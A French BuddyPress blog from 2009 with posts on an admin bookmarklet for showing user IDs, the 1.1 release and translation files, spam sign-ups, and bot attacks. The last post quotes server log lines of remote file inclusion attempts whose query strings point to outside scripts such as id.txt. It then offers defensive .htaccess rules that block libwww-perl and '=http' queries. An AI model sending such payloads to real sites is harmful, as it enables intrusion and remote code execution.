BuddyPress France

Comment afficher le user ID dans la liste des utilisateurs quand on est dans l’administration de WPMU ? On va dans “administration” -> “utilisateurs” qui affiche la liste et on injecte un peu de javascript dans la barre d’adresse.

Le bout de code à copier/coller dans le navigateur:

javascript:var user_id = jQuery('span.edit a').each(function(){ var sHref = jQuery(this).attr('href'); var sStart = sHref.indexOf('='); var sEnd = sHref.indexOf('&'); jQuery(this).parents('div.row-actions').before(sHref.slice(sStart +1,sEnd));});

Ça peut servir ! 

Ami(e)s buddyPressé(e)s, le big boss l’a annoncé lui-même hier: une version 1.1 est planifiée pour septembre.

Cette nouvelle mouture s’annonce prometteuse avec la mise en place d’un framework pour créer ses thèmes. La version 1.1 mettra ainsi fin à l’utilisation de 2 thèmes distincts. Il n’y en aura plus qu’un désormais et sa réalisation sera simplifiée. Pour les anciens usagers de BP cela signifie cependant qu’il faudra réviser les “vieux” thèmes pour les adapter au nouveau système.

Concernant la traduction française de BP, le fichier .mo actuel est en plein chamboulement…
Il contient des lignes qui seront bientôt obsolètes (d’ici 2 – 3 versions) , d’autres qui ne sont pas encore utilisables (1.1)  avec la version courante (1.0.3)  et toute la traduction de bbPress… Quelques améliorations syntaxiques ont été ajoutées pour une meilleure compréhension de certains éléments, quelques corrections orthographiques et 2 -3 modifications d’expressions ont été révisées.

Cette nouvelle traduction est disponible à l’endroit habituel.

Attention, si vous utilisez le fichier .pot du trunk pour faire vos propres traductions/rectifications/mises à jour, vérifiez que toutes les lignes qui se trouvent à la fin de notre fichier .po (après la ligne 9943 – 11 lignes à traduire qui manquent depuis plusieurs versions) se trouvent aussi dans le .pot que vous allez utiliser et avant de lancer PoEdit.

Le spammeur ne prend jamais de vacances ! Et pour cause, à part compter des shell* vide, il n’a rien à faire sur une plage le pôvre. (Cela dit, je vois mal un disque dur en train de siroter un mojito sur une terrasse à Ibiza…) Sur les 3 inscriptions de cette nuit, en voici 2 émanant de la même IP. Le journal de connexion du serveur a enregistré plusieurs activités pour cette IP. Vu le laps de temps écoulé (> 1/2h), je pense qu’il s’agit d’opérateurs manuels qui sévissent sporadiquement, tous les 2 – 3 jours. Ils s’inscrivent, ouvrent un blog une fois sur deux et c’est tout. Je me contente de les virer au jour le jour. Bannir les IP ne sert à rien, les bloquer au niveau du mail non plus. *coquilles

66.249.66.162 – - [12/Aug/2009:05:35:21 +0200] “GET /bpdemo/members/pedrodavid1970/profile HTTP/1.1″ 302 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
66.249.66.162 – - [12/Aug/2009:05:35:22 +0200] “GET /bpdemo/members/williamshields1973/profile HTTP/1.1″ 302 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

Plus silencieux, plus pernicieux et potentiellement plus dangereux, les attaques de bots avec ou sans enregistrement de membres, c’est selon. Environ une centaine par mois en ce qui concerne www.buddypress-fr.net

Je ne suis pas expert en la matière, mais j’ai tout de même lu la doc qui accompagne le plugin WP-SPamfree en service sur la démo depuis 2 mois. Ce faisant j’ai appris que l’on pouvait minimiser les risques d’attaques en bloquant depuis .htaccess une librairie du nom de libwww-perl, particulièrement utilisée par les garnements du hacks dominical. Ce user-agent se distingue en utilisant des URL d’accès pour le moins originales, comme vous pouvez le voir ci-dessous. Inutile de vous préciser que ces url sont bidons. Parfois même comiques, comme celle utilisant com_virtuemart qui est, si je ne m’abuse, un composant joomla. Bin voui, tout est bon pour essayer d’entrer sur un site WPMU: article, forum, fichier système, widget,… et composants Joom ! C’est trèèès con, non ? (source)

79.148.238.69 – - [09/Jul/2009:04:52:32 +0200] “GET /?_SERVER[DOCUMENT_ROOT]=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1″ 200 9385 “-” “libwww-perl/5.79″
69.10.155.111 – - [09/Jul/2009:17:49:04 +0200] “GET /index.php?buddy=installation//includes/header.php?c_temp_path=http://swoooper.com//config/b1ttletX1.txt??? HTTP/1.1″ 404 195 “-” “libwww-perl/5.79″
65.38.210.157 – - [09/Jul/2009:18:22:47 +0200] “GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1″ 404 357 “-” “libwww-perl/5.803″
66.244.236.248 – - [10/Aug/2009:17:21:00 +0200] “GET /bpdemo/forum/topic/ou-placer-la-t…de-bppicture-album/page/2/index2.php?mosConfig_absolute_path=http://webone.smartqms.co.uk//totorials/id.txt?? HTTP/1.1″ 200 3767 “-” “libwww-perl/5.805″
66.244.236.248 – - [10/Aug/2009:17:24:57 +0200] “GET /bpdemo/forum/index2.php?mosConfig_absolute_path=http://webone.smartqms.co.uk//totorials/id.txt?? HTTP/1.1″ 200 3669 “-” “libwww-perl/5.805″

Pour contourner cela, un peu, sans être la panacée non plus mais c’est mieux que rien, vous pouvez coller ce qui suit dans votre htaccess. Code fournit par www.hybrid6.com (voir source ci-dessus)

# Bloquer l’accès à libwww-perl et bloquer les URL incluant “=http:” pour réduire au maximum les attaques

RewriteCond %{HTTP_USER_AGENT} libwww [NC]
RewriteRule ^(.*)$ – [F,L]

RewriteCond %{REQUEST_URI} !(wp\-login\.php|\/wp\-admin\/) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ – [F,L]